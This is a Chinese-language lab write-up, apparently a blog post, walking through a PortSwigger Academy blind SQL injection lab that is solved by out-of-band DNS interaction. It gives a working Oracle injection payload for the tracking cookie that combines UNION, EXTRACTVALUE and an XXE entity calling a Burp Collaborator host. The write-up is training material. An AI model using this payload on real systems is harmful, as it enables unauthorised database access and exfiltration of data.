目录

Lab16_-Blind-SQL-injection-with-out-of-band-interaction

Lab16_ Blind SQL injection with out-of-band interaction

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

https://i-blog.csdnimg.cn/img_convert/e7a795a367f352a27e87055ad63f8b9d.png#pic_left

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

https://i-blog.csdnimg.cn/img_convert/02fdf9ecf3d5a0520f3a62a57031675a.png#pic_left

将 payload 粘贴在 cookie 后面,并进行 url 编码

https://i-blog.csdnimg.cn/img_convert/099dda6abc1177283572f6f3abff8fef.png#pic_left

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

https://i-blog.csdnimg.cn/img_convert/429ee871ee04a7159c1a8c358646f789.png#pic_left

返回商店页面,可以看到通关提示

https://i-blog.csdnimg.cn/img_convert/456470b07e55eee2f5229ef85fd580c9.png#pic_left